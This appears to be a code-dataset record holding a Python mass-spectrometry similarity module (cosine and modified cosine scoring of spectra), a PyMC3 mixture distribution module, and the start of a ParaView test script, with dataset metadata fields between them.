Tolerance to still count peaks a match (mz +- tolerance).
    max_mz: float
        Maximum m/z value to take into account
    #min_mz: float
    #    Minimum m/z value to take into account
min_intens: float
Sets the minimum relative intensity peaks must have to be looked at for
potential matches.
mass_shifting: bool
Set to 'True' if mass difference between spectra should be accounted for
--> "modified cosine" score
Set to 'False' for --> "normal cosine" score
    method: 'greedy', 'greedy-numba', 'hungarian'
        "greedy" will use Simon's molnet scoring, which is faster than hungarian
        but not 100% accurate with respect to the weighted bipartite matching problem.
        "hungarian" will use the Hungarian algorithm, which is more accurate.
        Since it is slower, numba-compiled helpers are used to speed it up.
        "greedy-numba" will use a (partly) numba-compiled version of greedy.
        Much faster, but needs numba.
num_workers: int
Number of threads to use for calculation.
    filename: str/ None
        Filename to look for an existing npy-file with the modcos matrix. Or, if not
        found, to use to save the newly calculated matrix.
safety_points: int
Number of safety points, i.e. number of times the modcos-matrix is saved
during process. Set to 'None' to avoid saving matrix on the way.
"""
if filename is not None:
if filename[-4:] != '.npy':
filename = filename + '.npy'
# Try loading saved data
try:
print("Loading similarity scores from", filename)
modcos_sim = np.load(filename)
print("Loading min_match values from", filename[:-4]+ "_matches.npy")
modcos_matches = np.load(filename[:-4] + "_matches.npy")
# Check if matrix was calculated to the end:
diagonal = modcos_sim.diagonal()
if np.min(diagonal) == 0:
print("Uncomplete cosine similarity scores found and loaded.")
missing_scores = np.where(diagonal == 0)[0].astype(int)
print("Missing cosine scores will be calculated.")
counter_total = int((len(spectra)**2)/2)
counter_init = counter_total - np.sum(len(spectra) - missing_scores)
print("About ", 100*(counter_init/counter_total),
"% of the values already completed.")
collect_new_data = True
else:
print("Complete cosine similarity scores found and loaded.")
missing_scores = []
counter_init = 0
collect_new_data = False
except FileNotFoundError:
print("Could not find file ", filename, "or file",
filename[:-4] + "_matches.npy")
if mass_shifting:
print("Modified cosine scores will be calculated from scratch.")
else:
print("Cosine scores will be calculated from scratch.")
collect_new_data = True
missing_scores = np.arange(0, len(spectra))
counter_init = 0
else:
collect_new_data = True
missing_scores = np.arange(0, len(spectra))
counter_init = 0
if collect_new_data:
if counter_init == 0:
modcos_sim = np.zeros((len(spectra), len(spectra)))
modcos_matches = np.zeros((len(spectra), len(spectra)))
counter = counter_init
if safety_points is not None:
# Save modcos-matrix along process
safety_save = int(((len(spectra)**2)/2)/safety_points)
print("Calculate pairwise scores by", num_workers, "number of workers.")
        for i in missing_scores:
spec1 = np.array(spectra[i].peaks, dtype=float)
spec1 = spec1[spec1[:, 0] < max_mz, :]
parameter_collection = []
for j in range(i, len(spectra)):
spec2 = np.array(spectra[j].peaks, dtype=float)
spec2 = spec2[spec2[:, 0] < max_mz, :]
if mass_shifting:
mass_shift = spectra[i].parent_mz - spectra[j].parent_mz
else:
mass_shift = None
parameter_collection.append([spec1, spec2, i, j,
mass_shift, tol, min_intens,
method, counter])
counter += 1
            # Create a pool of worker threads, one future per (i, j) spectrum pair.
modcos_pairs = []
with ThreadPoolExecutor(max_workers=num_workers) as executor:
futures = [executor.submit(modcos_pair, X, len(spectra)) for X in parameter_collection]
modcos_pairs.append(futures)
for m, future in enumerate(modcos_pairs[0]):
_, _, ind_i, ind_j, _, _, _, _, counting = parameter_collection[m]
modcos_sim[ind_i, ind_j] = future.result()[0]
modcos_matches[ind_i, ind_j] = future.result()[1]
if filename is not None \
and safety_points is not None:
if (counting+1) % safety_save == 0:
np.save(filename, modcos_sim)
np.save(filename[:-4] + "_matches.npy", modcos_matches)
# Symmetric matrix --> fill
for i in range(1, len(spectra)):
for j in range(i):
modcos_sim[i, j] = modcos_sim[j, i]
modcos_matches[i, j] = modcos_matches[j, i]
# Save final results
if filename is not None:
np.save(filename, modcos_sim)
            np.save(filename[:-4] + "_matches.npy", modcos_matches)
return modcos_sim, modcos_matches
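# Hedged end-to-end sketch (illustrative): runs the full pairwise scorer on
# two toy spectra, reusing the hypothetical `_DemoSpectrum` stand-in defined
# above. method='greedy' avoids the numba requirement; filename=None skips
# all on-disk caching.
def _demo_cosine_score_matrix():
    s1 = _DemoSpectrum([(100.0, 0.7), (150.0, 1.0)], parent_mz=200.0)
    s2 = _DemoSpectrum([(100.05, 0.6), (150.0, 0.9)], parent_mz=201.0)
    sims, n_matches = cosine_score_matrix([s1, s2], tol=0.1, method='greedy',
                                          mass_shifting=True, num_workers=1)
    return sims, n_matches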
def modcos_pair(X, len_spectra):
"""Single molnet pair calculation
"""
spectra_i, spectra_j, i, j, mass_shift, tol, min_intens, method, counter = X
if method == 'greedy':
molnet_pair, used_matches = cosine_score_greedy(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens,
use_numba=False)
elif method == 'greedy-numba':
molnet_pair, used_matches = cosine_score_greedy(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens,
use_numba=True)
elif method == 'hungarian':
molnet_pair, used_matches = cosine_score_hungarian(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens)
    else:
        raise ValueError("Given method '{}' does not exist...".format(method))
if (counter+1) % 1000 == 0 or counter == len_spectra-1:
print('\r',
' Calculated MolNet for pair {} -- {}'.format(i, j),
'. ( ', np.round(200*(counter+1)/len_spectra**2, 2), ' % done).',
end="")
return molnet_pair, len(used_matches)
def one_hot_spectrum(spec,
tol,
max_mz,
shift=0,
min_mz=0,
method='max'):
"""Convert spectrum peaks into on-hot-vector
method: str
'max' take highest intensity peak within every bin.
'sum' take sum of all peaks within every bin.
"""
dim_vector = int((max_mz - min_mz)/tol)
one_hot_spec = np.zeros((dim_vector))
    idx = ((spec[:, 0] + shift - min_mz)/tol).astype(int)
idx[idx >= dim_vector] = 0
idx[idx < 0] = 0
if method == 'max':
for id1 in set(idx):
one_hot_spec[id1] = np.max(spec[(idx == id1), 1])
elif method == 'sum':
for id1 in set(idx):
one_hot_spec[id1] = np.sum(spec[(idx == id1), 1])
    else:
        raise ValueError("Method '{}' not known...".format(method))
return one_hot_spec
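# Hedged mini-example (illustrative): shows how 'max' and 'sum' binning differ
# when two hypothetical peaks fall into the same tol-wide bin.
def _demo_one_hot_spectrum():
    spec = np.array([[100.1, 0.4], [100.3, 0.5], [200.0, 1.0]])
    by_max = one_hot_spectrum(spec, tol=1.0, max_mz=300.0, method='max')
    by_sum = one_hot_spectrum(spec, tol=1.0, max_mz=300.0, method='sum')
    # bin 100 holds 0.5 under 'max' but 0.9 under 'sum'
    return by_max[100], by_sum[100]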
@numba.njit
def find_pairs_numba(spec1, spec2, tol, shift=0):
"""Find matching pairs between two spectra.
Args
----
spec1 : list of tuples
List of (mz, intensity) tuples.
spec2 : list of tuples
List of (mz, intensity) tuples.
tol : float
        Tolerance. Peaks will be considered a match when < tol apart.
shift : float, optional
Shift spectra peaks by shift. The default is 0.
Returns
-------
matching_pairs : list
List of found matching peaks.
"""
matching_pairs = []
for idx in range(len(spec1)):
intensity = spec1[idx, 1]
matches = np.where((np.abs(spec2[:, 0] - spec1[idx, 0] + shift) <= tol))[0]
for match in matches:
matching_pairs.append((idx, match, intensity*spec2[match][1]))
return matching_pairs
def find_pairs(spec1, spec2, tol, shift=0):
"""Find matching pairs between two spectra.
Args
----
spec1 : list of tuples
List of (mz, intensity) tuples.
spec2 : list of tuples
List of (mz, intensity) tuples.
tol : float
        Tolerance. Peaks will be considered a match when < tol apart.
shift : float, optional
Shift spectra peaks by shift. The default is 0.
Returns
-------
matching_pairs : list
List of found matching peaks.
"""
# Sort peaks and losses by m/z
spec1 = spec1[np.lexsort((spec1[:, 1], spec1[:, 0])), :]
spec2 = spec2[np.lexsort((spec2[:, 1], spec2[:, 0])), :]
matching_pairs = []
spec2lowpos = 0
spec2length = len(spec2)
for idx in range(len(spec1)):
mz = spec1[idx, 0]
intensity = spec1[idx, 1]
# Do we need to increase the lower idx?
while spec2lowpos < spec2length and spec2[spec2lowpos][0] + shift < mz - tol:
spec2lowpos += 1
if spec2lowpos == spec2length:
break
spec2pos = spec2lowpos
        while spec2pos < spec2length and spec2[spec2pos][0] + shift < mz + tol:
matching_pairs.append((idx, spec2pos, intensity * spec2[spec2pos][1]))
spec2pos += 1
return matching_pairs
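# Hedged sketch (illustrative): find_pairs and find_pairs_numba should agree
# on these hypothetical peak lists; each returned triple is
# (index_in_spec1, index_in_spec2, intensity_product).
def _demo_find_pairs():
    spec1 = np.array([[100.0, 1.0], [150.0, 0.5]])
    spec2 = np.array([[100.02, 0.8], [160.0, 0.3]])
    pairs = find_pairs(spec1, spec2, tol=0.1)
    # expected: [(0, 0, 0.8)] -- only the 100 m/z peaks are within tol
    return pairs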
| 37.783688
| 103
| 0.57114
|
import numba
import numpy as np
from scipy.optimize import linear_sum_assignment
from scipy import spatial
from concurrent.futures import ThreadPoolExecutor
def mol_sim_matrix(fingerprints1,
fingerprints2,
method='cosine',
filename=None,
max_size=1000,
print_progress=True):
if filename is not None:
try:
molecular_similarities = np.load(filename)
print("Molecular similarity scores found and loaded.")
collect_new_data = False
except FileNotFoundError:
print("Could not find file ", filename)
print("Molecular scores will be calculated from scratch.")
collect_new_data = True
else:
collect_new_data = True
if collect_new_data:
fingerprints_arr1 = np.array(fingerprints1)
fingerprints_arr2 = np.array(fingerprints2)
matrix_size = (fingerprints_arr1.shape[0], fingerprints_arr2.shape[0])
molecular_similarities = np.zeros(matrix_size)
splits = int(np.ceil(matrix_size[0]/max_size) * np.ceil(matrix_size[1]/max_size))
count_splits = 0
for i in range(int(np.ceil(matrix_size[0]/max_size))):
low1 = i * max_size
high1 = min((i + 1) * max_size, matrix_size[0])
for j in range(int(np.ceil(matrix_size[1]/max_size))):
low2 = j * max_size
high2 = min((j + 1) * max_size, matrix_size[1])
molecular_similarities[low1:high1, low2:high2] = 1 - spatial.distance.cdist(
fingerprints_arr1[low1:high1],
fingerprints_arr2[low2:high2],
method
)
count_splits += 1
if print_progress:
print('\r',
"Calculated submatrix {} out of {}".format(count_splits, splits),
end="")
if print_progress:
print(20 * '--')
print("Succesfully calculated matrix with all-vs-all molecular similarity values.")
if filename is not None:
np.save(filename, molecular_similarities)
print("Matrix was saved under:", filename)
return molecular_similarities
def cosine_score_greedy(spec1,
spec2,
mass_shift,
tol,
min_intens=0,
use_numba=True):
if spec1.shape[0] == 0 or spec2.shape[0] == 0:
return 0.0, []
spec1[:, 1] = spec1[:, 1]/max(spec1[:, 1])
spec2[:, 1] = spec2[:, 1]/max(spec2[:, 1])
spec1 = spec1[spec1[:, 1] > min_intens, :]
spec2 = spec2[spec2[:, 1] > min_intens, :]
if use_numba:
zero_pairs = find_pairs_numba(spec1, spec2, tol, shift=0.0)
else:
zero_pairs = find_pairs(spec1, spec2, tol, shift=0.0)
if mass_shift is not None \
and mass_shift != 0.0:
if use_numba:
nonzero_pairs = find_pairs_numba(spec1, spec2, tol, shift=mass_shift)
else:
nonzero_pairs = find_pairs(spec1, spec2, tol, shift=mass_shift)
matching_pairs = zero_pairs + nonzero_pairs
else:
matching_pairs = zero_pairs
matching_pairs = sorted(matching_pairs, key=lambda x: x[2], reverse=True)
used1 = set()
used2 = set()
score = 0.0
used_matches = []
for m in matching_pairs:
if not m[0] in used1 and not m[1] in used2:
score += m[2]
used1.add(m[0])
used2.add(m[1])
used_matches.append(m)
score = score/max(np.sum(spec1[:, 1]**2), np.sum(spec2[:, 1]**2))
return score, used_matches
def cosine_score_hungarian(spec1,
spec2,
mass_shift,
tol,
min_intens=0):
if spec1.shape[0] == 0 or spec2.shape[0] == 0:
return 0.0, []
spec1[:, 1] = spec1[:, 1]/max(spec1[:, 1])
spec2[:, 1] = spec2[:, 1]/max(spec2[:, 1])
spec1 = spec1[spec1[:, 1] > min_intens, :]
spec2 = spec2[spec2[:, 1] > min_intens, :]
zero_pairs = find_pairs_numba(spec1, spec2, tol, shift=0.0)
if mass_shift is not None \
and mass_shift != 0.0:
nonzero_pairs = find_pairs_numba(spec1, spec2, tol, shift=mass_shift)
matching_pairs = zero_pairs + nonzero_pairs
else:
matching_pairs = zero_pairs
matching_pairs = sorted(matching_pairs, key=lambda x: x[2], reverse=True)
used_matches = []
list1 = list(set([x[0] for x in matching_pairs]))
list2 = list(set([x[1] for x in matching_pairs]))
matrix_size = (len(list1), len(list2))
matrix = np.ones(matrix_size)
if len(matching_pairs) > 0:
for m in matching_pairs:
matrix[list1.index(m[0]), list2.index(m[1])] = 1 - m[2]
row_ind, col_ind = linear_sum_assignment(matrix)
score = len(row_ind) - matrix[row_ind, col_ind].sum()
used_matches = [(list1[x], list2[y]) for (x, y) in zip(row_ind, col_ind)]
score = score/max(np.sum(spec1[:, 1]**2), np.sum(spec2[:, 1]**2))
else:
score = 0.0
return score, used_matches
def cosine_matrix_fast(spectra,
tol,
max_mz,
min_mz=0):
for i, spectrum in enumerate(spectra):
spec = np.array(spectrum.peaks.copy(), dtype=float)
spec[:, 1] = spec[:, 1]/np.max(spec[:, 1])
if i == 0:
vector = one_hot_spectrum(spec, tol, max_mz, shift=0, min_mz=min_mz, method='max')
spec_vectors = np.zeros((len(spectra), vector.shape[0]))
spec_vectors[0, :] = vector
else:
spec_vectors[i, :] = one_hot_spectrum(spec, tol,
max_mz, shift=0,
min_mz=min_mz,
method='max')
Cdist = spatial.distance.cdist(spec_vectors, spec_vectors, 'cosine')
return 1 - Cdist
def cosine_score_matrix(spectra,
tol,
max_mz=1000.0,
min_intens=0,
mass_shifting=False,
method='hungarian',
num_workers=4,
filename=None,
safety_points=None):
if filename is not None:
if filename[-4:] != '.npy':
filename = filename + '.npy'
try:
print("Loading similarity scores from", filename)
modcos_sim = np.load(filename)
print("Loading min_match values from", filename[:-4]+ "_matches.npy")
modcos_matches = np.load(filename[:-4] + "_matches.npy")
diagonal = modcos_sim.diagonal()
if np.min(diagonal) == 0:
print("Uncomplete cosine similarity scores found and loaded.")
missing_scores = np.where(diagonal == 0)[0].astype(int)
print("Missing cosine scores will be calculated.")
counter_total = int((len(spectra)**2)/2)
counter_init = counter_total - np.sum(len(spectra) - missing_scores)
print("About ", 100*(counter_init/counter_total),
"% of the values already completed.")
collect_new_data = True
else:
print("Complete cosine similarity scores found and loaded.")
missing_scores = []
counter_init = 0
collect_new_data = False
except FileNotFoundError:
print("Could not find file ", filename, "or file",
filename[:-4] + "_matches.npy")
if mass_shifting:
print("Modified cosine scores will be calculated from scratch.")
else:
print("Cosine scores will be calculated from scratch.")
collect_new_data = True
missing_scores = np.arange(0, len(spectra))
counter_init = 0
else:
collect_new_data = True
missing_scores = np.arange(0, len(spectra))
counter_init = 0
if collect_new_data:
if counter_init == 0:
modcos_sim = np.zeros((len(spectra), len(spectra)))
modcos_matches = np.zeros((len(spectra), len(spectra)))
counter = counter_init
if safety_points is not None:
safety_save = int(((len(spectra)**2)/2)/safety_points)
print("Calculate pairwise scores by", num_workers, "number of workers.")
for i in missing_scores:
spec1 = np.array(spectra[i].peaks, dtype=float)
spec1 = spec1[spec1[:, 0] < max_mz, :]
parameter_collection = []
for j in range(i, len(spectra)):
spec2 = np.array(spectra[j].peaks, dtype=float)
spec2 = spec2[spec2[:, 0] < max_mz, :]
if mass_shifting:
mass_shift = spectra[i].parent_mz - spectra[j].parent_mz
else:
mass_shift = None
parameter_collection.append([spec1, spec2, i, j,
mass_shift, tol, min_intens,
method, counter])
counter += 1
modcos_pairs = []
with ThreadPoolExecutor(max_workers=num_workers) as executor:
futures = [executor.submit(modcos_pair, X, len(spectra)) for X in parameter_collection]
modcos_pairs.append(futures)
for m, future in enumerate(modcos_pairs[0]):
_, _, ind_i, ind_j, _, _, _, _, counting = parameter_collection[m]
modcos_sim[ind_i, ind_j] = future.result()[0]
modcos_matches[ind_i, ind_j] = future.result()[1]
if filename is not None \
and safety_points is not None:
if (counting+1) % safety_save == 0:
np.save(filename, modcos_sim)
np.save(filename[:-4] + "_matches.npy", modcos_matches)
for i in range(1, len(spectra)):
for j in range(i):
modcos_sim[i, j] = modcos_sim[j, i]
modcos_matches[i, j] = modcos_matches[j, i]
if filename is not None:
np.save(filename, modcos_sim)
            np.save(filename[:-4] + "_matches.npy", modcos_matches)
return modcos_sim, modcos_matches
def modcos_pair(X, len_spectra):
spectra_i, spectra_j, i, j, mass_shift, tol, min_intens, method, counter = X
if method == 'greedy':
molnet_pair, used_matches = cosine_score_greedy(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens,
use_numba=False)
elif method == 'greedy-numba':
molnet_pair, used_matches = cosine_score_greedy(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens,
use_numba=True)
elif method == 'hungarian':
molnet_pair, used_matches = cosine_score_hungarian(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens)
    else:
        raise ValueError("Given method '{}' does not exist...".format(method))
if (counter+1) % 1000 == 0 or counter == len_spectra-1:
print('\r',
' Calculated MolNet for pair {} -- {}'.format(i, j),
'. ( ', np.round(200*(counter+1)/len_spectra**2, 2), ' % done).',
end="")
return molnet_pair, len(used_matches)
def one_hot_spectrum(spec,
tol,
max_mz,
shift=0,
min_mz=0,
method='max'):
dim_vector = int((max_mz - min_mz)/tol)
one_hot_spec = np.zeros((dim_vector))
    idx = ((spec[:, 0] + shift - min_mz)/tol).astype(int)
idx[idx >= dim_vector] = 0
idx[idx < 0] = 0
if method == 'max':
for id1 in set(idx):
one_hot_spec[id1] = np.max(spec[(idx == id1), 1])
elif method == 'sum':
for id1 in set(idx):
one_hot_spec[id1] = np.sum(spec[(idx == id1), 1])
    else:
        raise ValueError("Method '{}' not known...".format(method))
return one_hot_spec
@numba.njit
def find_pairs_numba(spec1, spec2, tol, shift=0):
matching_pairs = []
for idx in range(len(spec1)):
intensity = spec1[idx, 1]
matches = np.where((np.abs(spec2[:, 0] - spec1[idx, 0] + shift) <= tol))[0]
for match in matches:
matching_pairs.append((idx, match, intensity*spec2[match][1]))
return matching_pairs
def find_pairs(spec1, spec2, tol, shift=0):
spec1 = spec1[np.lexsort((spec1[:, 1], spec1[:, 0])), :]
spec2 = spec2[np.lexsort((spec2[:, 1], spec2[:, 0])), :]
matching_pairs = []
spec2lowpos = 0
spec2length = len(spec2)
for idx in range(len(spec1)):
mz = spec1[idx, 0]
intensity = spec1[idx, 1]
while spec2lowpos < spec2length and spec2[spec2lowpos][0] + shift < mz - tol:
spec2lowpos += 1
if spec2lowpos == spec2length:
break
spec2pos = spec2lowpos
        while spec2pos < spec2length and spec2[spec2pos][0] + shift < mz + tol:
matching_pairs.append((idx, spec2pos, intensity * spec2[spec2pos][1]))
spec2pos += 1
return matching_pairs
| true
| true
|
790db8ba305a6bee2517597e27a90ff727edd601
| 7,725
|
py
|
Python
|
pymc3/distributions/mixture.py
|
rsumner31/pymc3-2
|
e824294ddfb45610536cad07394b8c290904c38d
|
[
"Apache-2.0"
] | null | null | null |
pymc3/distributions/mixture.py
|
rsumner31/pymc3-2
|
e824294ddfb45610536cad07394b8c290904c38d
|
[
"Apache-2.0"
] | null | null | null |
pymc3/distributions/mixture.py
|
rsumner31/pymc3-2
|
e824294ddfb45610536cad07394b8c290904c38d
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import theano.tensor as tt
from pymc3.util import get_variable_name
from ..math import logsumexp
from .dist_math import bound
from .distribution import Discrete, Distribution, draw_values, generate_samples
from .continuous import get_tau_sd, Normal
def all_discrete(comp_dists):
"""
Determine if all distributions in comp_dists are discrete
"""
if isinstance(comp_dists, Distribution):
return isinstance(comp_dists, Discrete)
else:
return all(isinstance(comp_dist, Discrete) for comp_dist in comp_dists)
class Mixture(Distribution):
R"""
Mixture log-likelihood
Often used to model subpopulation heterogeneity
.. math:: f(x \mid w, \theta) = \sum_{i = 1}^n w_i f_i(x \mid \theta_i)
======== ============================================
Support :math:`\cap_{i = 1}^n \textrm{support}(f_i)`
Mean :math:`\sum_{i = 1}^n w_i \mu_i`
======== ============================================
Parameters
----------
w : array of floats
w >= 0 and w <= 1
the mixture weights
    comp_dists : multidimensional PyMC3 distribution (e.g. `pm.Poisson.dist(...)`)
        or iterable of one-dimensional PyMC3 distributions: the
        component distributions :math:`f_1, \ldots, f_n`
Example
-------
.. code-block:: python
# 2-Mixture Poisson distribution
with pm.Model() as model:
lam = pm.Exponential('lam', lam=1, shape=(2,)) # `shape=(2,)` indicates two mixtures.
# As we just need the logp, rather than add a RV to the model, we need to call .dist()
components = pm.Poisson.dist(mu=lam, shape=(2,))
w = pm.Dirichlet('w', a=np.array([1, 1])) # two mixture component weights.
like = pm.Mixture('like', w=w, comp_dists=components, observed=data)
# 2-Mixture Poisson using iterable of distributions.
with pm.Model() as model:
lam1 = pm.Exponential('lam1', lam=1)
lam2 = pm.Exponential('lam2', lam=1)
pois1 = pm.Poisson.dist(mu=lam1)
pois2 = pm.Poisson.dist(mu=lam2)
w = pm.Dirichlet('w', a=np.array([1, 1]))
like = pm.Mixture('like', w=w, comp_dists = [pois1, pois2], observed=data)
"""
def __init__(self, w, comp_dists, *args, **kwargs):
shape = kwargs.pop('shape', ())
self.w = w = tt.as_tensor_variable(w)
self.comp_dists = comp_dists
defaults = kwargs.pop('defaults', [])
if all_discrete(comp_dists):
dtype = kwargs.pop('dtype', 'int64')
else:
dtype = kwargs.pop('dtype', 'float64')
try:
self.mean = (w * self._comp_means()).sum(axis=-1)
if 'mean' not in defaults:
defaults.append('mean')
except AttributeError:
pass
try:
comp_modes = self._comp_modes()
comp_mode_logps = self.logp(comp_modes)
self.mode = comp_modes[tt.argmax(w * comp_mode_logps, axis=-1)]
if 'mode' not in defaults:
defaults.append('mode')
except AttributeError:
pass
super(Mixture, self).__init__(shape, dtype, defaults=defaults,
*args, **kwargs)
def _comp_logp(self, value):
comp_dists = self.comp_dists
try:
value_ = value if value.ndim > 1 else tt.shape_padright(value)
return comp_dists.logp(value_)
except AttributeError:
return tt.stack([comp_dist.logp(value) for comp_dist in comp_dists],
axis=1)
def _comp_means(self):
try:
return tt.as_tensor_variable(self.comp_dists.mean)
except AttributeError:
return tt.stack([comp_dist.mean for comp_dist in self.comp_dists],
axis=1)
def _comp_modes(self):
try:
return tt.as_tensor_variable(self.comp_dists.mode)
except AttributeError:
return tt.stack([comp_dist.mode for comp_dist in self.comp_dists],
axis=1)
def _comp_samples(self, point=None, size=None, repeat=None):
try:
samples = self.comp_dists.random(point=point, size=size, repeat=repeat)
except AttributeError:
samples = np.column_stack([comp_dist.random(point=point, size=size, repeat=repeat)
for comp_dist in self.comp_dists])
return np.squeeze(samples)
def logp(self, value):
w = self.w
return bound(logsumexp(tt.log(w) + self._comp_logp(value), axis=-1).sum(),
w >= 0, w <= 1, tt.allclose(w.sum(axis=-1), 1),
broadcast_conditions=False)
def random(self, point=None, size=None, repeat=None):
def random_choice(*args, **kwargs):
w = kwargs.pop('w')
w /= w.sum(axis=-1, keepdims=True)
k = w.shape[-1]
if w.ndim > 1:
return np.row_stack([np.random.choice(k, p=w_) for w_ in w])
else:
return np.random.choice(k, p=w, *args, **kwargs)
w = draw_values([self.w], point=point)[0]
w_samples = generate_samples(random_choice,
w=w,
broadcast_shape=w.shape[:-1] or (1,),
dist_shape=self.shape,
size=size).squeeze()
comp_samples = self._comp_samples(point=point, size=size, repeat=repeat)
if comp_samples.ndim > 1:
return np.squeeze(comp_samples[np.arange(w_samples.size), w_samples])
else:
return np.squeeze(comp_samples[w_samples])
class NormalMixture(Mixture):
R"""
Normal mixture log-likelihood
.. math::
f(x \mid w, \mu, \sigma^2) = \sum_{i = 1}^n w_i N(x \mid \mu_i, \sigma^2_i)
======== =======================================
Support :math:`x \in \mathbb{R}`
Mean :math:`\sum_{i = 1}^n w_i \mu_i`
Variance :math:`\sum_{i = 1}^n w_i^2 \sigma^2_i`
======== =======================================
Parameters
----------
w : array of floats
w >= 0 and w <= 1
the mixture weights
mu : array of floats
the component means
sd : array of floats
the component standard deviations
tau : array of floats
the component precisions
Note: You only have to pass in sd or tau, but not both.
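    Example
    -------
    An illustrative two-component Gaussian mixture (sketch only, mirroring the
    ``Mixture`` examples above; ``data`` stands for observed 1-d values):
    .. code-block:: python
        with pm.Model() as model:
            w = pm.Dirichlet('w', a=np.array([1, 1]))
            mu = pm.Normal('mu', mu=0., sd=10., shape=2)
            sd = pm.HalfNormal('sd', sd=10., shape=2)
            like = pm.NormalMixture('like', w=w, mu=mu, sd=sd, observed=data)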
"""
def __init__(self, w, mu, *args, **kwargs):
_, sd = get_tau_sd(tau=kwargs.pop('tau', None),
sd=kwargs.pop('sd', None))
distshape = np.broadcast(mu, sd).shape
self.mu = mu = tt.as_tensor_variable(mu)
self.sd = sd = tt.as_tensor_variable(sd)
if not distshape:
distshape = np.broadcast(mu.tag.test_value, sd.tag.test_value).shape
super(NormalMixture, self).__init__(w, Normal.dist(mu, sd=sd, shape=distshape),
*args, **kwargs)
def _repr_latex_(self, name=None, dist=None):
if dist is None:
dist = self
mu = dist.mu
w = dist.w
sd = dist.sd
name = r'\text{%s}' % name
return r'${} \sim \text{{NormalMixture}}(\mathit{{w}}={},~\mathit{{mu}}={},~\mathit{{sigma}}={})$'.format(name,
get_variable_name(w),
get_variable_name(mu),
get_variable_name(sd))
| 34.486607
| 119
| 0.535016
|
import numpy as np
import theano.tensor as tt
from pymc3.util import get_variable_name
from ..math import logsumexp
from .dist_math import bound
from .distribution import Discrete, Distribution, draw_values, generate_samples
from .continuous import get_tau_sd, Normal
def all_discrete(comp_dists):
if isinstance(comp_dists, Distribution):
return isinstance(comp_dists, Discrete)
else:
return all(isinstance(comp_dist, Discrete) for comp_dist in comp_dists)
class Mixture(Distribution):
def __init__(self, w, comp_dists, *args, **kwargs):
shape = kwargs.pop('shape', ())
self.w = w = tt.as_tensor_variable(w)
self.comp_dists = comp_dists
defaults = kwargs.pop('defaults', [])
if all_discrete(comp_dists):
dtype = kwargs.pop('dtype', 'int64')
else:
dtype = kwargs.pop('dtype', 'float64')
try:
self.mean = (w * self._comp_means()).sum(axis=-1)
if 'mean' not in defaults:
defaults.append('mean')
except AttributeError:
pass
try:
comp_modes = self._comp_modes()
comp_mode_logps = self.logp(comp_modes)
self.mode = comp_modes[tt.argmax(w * comp_mode_logps, axis=-1)]
if 'mode' not in defaults:
defaults.append('mode')
except AttributeError:
pass
super(Mixture, self).__init__(shape, dtype, defaults=defaults,
*args, **kwargs)
def _comp_logp(self, value):
comp_dists = self.comp_dists
try:
value_ = value if value.ndim > 1 else tt.shape_padright(value)
return comp_dists.logp(value_)
except AttributeError:
return tt.stack([comp_dist.logp(value) for comp_dist in comp_dists],
axis=1)
def _comp_means(self):
try:
return tt.as_tensor_variable(self.comp_dists.mean)
except AttributeError:
return tt.stack([comp_dist.mean for comp_dist in self.comp_dists],
axis=1)
def _comp_modes(self):
try:
return tt.as_tensor_variable(self.comp_dists.mode)
except AttributeError:
return tt.stack([comp_dist.mode for comp_dist in self.comp_dists],
axis=1)
def _comp_samples(self, point=None, size=None, repeat=None):
try:
samples = self.comp_dists.random(point=point, size=size, repeat=repeat)
except AttributeError:
samples = np.column_stack([comp_dist.random(point=point, size=size, repeat=repeat)
for comp_dist in self.comp_dists])
return np.squeeze(samples)
def logp(self, value):
w = self.w
return bound(logsumexp(tt.log(w) + self._comp_logp(value), axis=-1).sum(),
w >= 0, w <= 1, tt.allclose(w.sum(axis=-1), 1),
broadcast_conditions=False)
def random(self, point=None, size=None, repeat=None):
def random_choice(*args, **kwargs):
w = kwargs.pop('w')
w /= w.sum(axis=-1, keepdims=True)
k = w.shape[-1]
if w.ndim > 1:
return np.row_stack([np.random.choice(k, p=w_) for w_ in w])
else:
return np.random.choice(k, p=w, *args, **kwargs)
w = draw_values([self.w], point=point)[0]
w_samples = generate_samples(random_choice,
w=w,
broadcast_shape=w.shape[:-1] or (1,),
dist_shape=self.shape,
size=size).squeeze()
comp_samples = self._comp_samples(point=point, size=size, repeat=repeat)
if comp_samples.ndim > 1:
return np.squeeze(comp_samples[np.arange(w_samples.size), w_samples])
else:
return np.squeeze(comp_samples[w_samples])
class NormalMixture(Mixture):
def __init__(self, w, mu, *args, **kwargs):
_, sd = get_tau_sd(tau=kwargs.pop('tau', None),
sd=kwargs.pop('sd', None))
distshape = np.broadcast(mu, sd).shape
self.mu = mu = tt.as_tensor_variable(mu)
self.sd = sd = tt.as_tensor_variable(sd)
if not distshape:
distshape = np.broadcast(mu.tag.test_value, sd.tag.test_value).shape
super(NormalMixture, self).__init__(w, Normal.dist(mu, sd=sd, shape=distshape),
*args, **kwargs)
def _repr_latex_(self, name=None, dist=None):
if dist is None:
dist = self
mu = dist.mu
w = dist.w
sd = dist.sd
name = r'\text{%s}' % name
return r'${} \sim \text{{NormalMixture}}(\mathit{{w}}={},~\mathit{{mu}}={},~\mathit{{sigma}}={})$'.format(name,
get_variable_name(w),
get_variable_name(mu),
get_variable_name(sd))
| true
| true
|
790db9c95aa81be22336050a55df0924b1114b92
| 2,080
|
py
|
Python
|
Clients/ParaView/Testing/Python/AppendAttributes.py
|
xj361685640/ParaView
|
0a27eef5abc5a0c0472ab0bc806c4db881156e64
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 815
|
2015-01-03T02:14:04.000Z
|
2022-03-26T07:48:07.000Z
|
Clients/ParaView/Testing/Python/AppendAttributes.py
|
xj361685640/ParaView
|
0a27eef5abc5a0c0472ab0bc806c4db881156e64
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 9
|
2015-04-28T20:10:37.000Z
|
2021-08-20T18:19:01.000Z
|
Clients/ParaView/Testing/Python/AppendAttributes.py
|
xj361685640/ParaView
|
0a27eef5abc5a0c0472ab0bc806c4db881156e64
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 328
|
2015-01-22T23:11:46.000Z
|
2022-03-14T06:07:52.000Z
|
#!/usr/bin/env python
from paraview.simple import *
import sys
wavelet1 = Wavelet()
wavelet2 = Wavelet()
